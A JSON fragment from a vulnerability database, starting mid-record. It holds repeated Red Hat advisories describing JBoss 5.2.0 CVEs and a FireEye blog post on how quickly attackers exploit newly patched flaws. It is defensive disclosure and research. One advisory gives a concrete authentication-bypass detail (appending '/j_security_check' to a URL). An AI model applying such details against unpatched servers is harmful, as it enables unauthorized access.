"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:37:45", "id": "RHSA-2013:0194", "href": "https://access.redhat.com/errata/RHSA-2013:0194", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2021-10-21T04:42:06", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. 
Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0196) Important: JBoss Enterprise Web Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2016-04-04T14:31:35", "id": "RHSA-2013:0196", "href": "https://access.redhat.com/errata/RHSA-2013:0196", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2021-10-19T18:39:43", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. 
Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0191) Important: JBoss Enterprise Application Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:37:46", "id": "RHSA-2013:0191", "href": "https://access.redhat.com/errata/RHSA-2013:0191", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:44:03", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. 
(CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0192) Important: JBoss Enterprise Application Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2016-04-04T14:31:19", "id": "RHSA-2013:0192", "href": "https://access.redhat.com/errata/RHSA-2013:0192", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:38:22", "description": "An attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain text\nof a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric\nkeys (for XML encryption), allowing a remote attacker to recover the entire\nplain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary code in\nthe context of the application server, or to obtain sensitive information\nfrom the server. Manual action is required to apply this fix. Refer to the\nSolution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a\nSupporting Token, but not whether the correct token was used. A remote\nattacker could transmit confidential information without the appropriate\nsecurity, and potentially circumvent access controls on web services\nexposed via Apache CXF. Refer to the Solution section for details.\n(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component\nthat calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was\npossible to bypass the security constraint checks in the FORM authenticator\nby appending \"/j_security_check\" to the end of a URL. (CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker\nto hijack the authenticated JMX Console session of an administrator.\n(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. 
(CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if\nno security context was provided. Depending on the deployed applications,\nthis could possibly allow a remote attacker to hijack the credentials of a\npreviously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local\nusers to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text\nwhen an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the log\nfile. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct exploitation\nof this flaw. If the interceptor was misconfigured or inadvertently\ndisabled, this flaw could lead to arbitrary code execution in the context\nof the user running the JBoss server. (CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a\nJGroups channel was started, allowing attackers on the adjacent network to\nread diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a\nnull password was provided. In non-default configurations this could\npossibly lead to a remote attacker hijacking a previously-authenticated\nuser's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for\nreporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for\nreporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575.\nCVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red\nHat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874\ndiscovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by\nRed Hat.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2013-01-24T00:00:00", "type": "redhat", "title": "(RHSA-2013:0195) Important: JBoss Enterprise Web Platform 5.2.0 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2018-06-06T22:39:14", "id": "RHSA-2013:0195", "href": "https://access.redhat.com/errata/RHSA-2013:0195", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], 
"fireeye": [{"lastseen": "2021-10-30T08:30:35", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 and Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. 
It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\nFigure 2: Time between vulnerability exploitation and patch issuance\n\n_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n| **Time to Exploit for Vulnerabilities First Exploited after a Patch** | |\n|---|---|\n| Hours | Two vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. |\n| Days | 12 percent of vulnerabilities were exploited within the first week following the patch release. |\n| One Month | 15 percent of vulnerabilities were exploited after one week but within one month of patch release. |
\n| Years | In multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. |\n\nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. 
This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\nFigure 5: Timeline of activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using it within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of PoC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that PoC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or PoC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. 
There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n| **Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events** | **Product** | **CVE** | **FireEye Risk Rating** |\n|---|---|---|---|\n| 1 day | WinRAR | CVE-2018-20250 | Medium |\n| 1 day | Drupal | CVE-2018-7600 | High |\n| 1 day | Cisco Adaptive Security Appliance | CVE-2018-0296 | Medium |\n| 2 days | Apache Struts | CVE-2018-11776 | High |\n| 2 days | Cisco Adaptive Security Appliance | CVE-2018-0101 | High |\n| 2 days | Oracle WebLogic Server | CVE-2018-2893 | High |\n| 2 days | Microsoft Windows Server | CVE-2018-8440 | Medium |\n| 2 days | Drupal | CVE-2019-6340 | Medium |\n| 2 days | Atlassian Confluence | CVE-2019-3396 | High |\n\nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. 
In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email-attached documents as initial infection vectors in phishing campaigns.\n\nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules; using it in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment, may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": 
"2020-04-13T00:00:00", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "modified": "2020-04-13T00:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}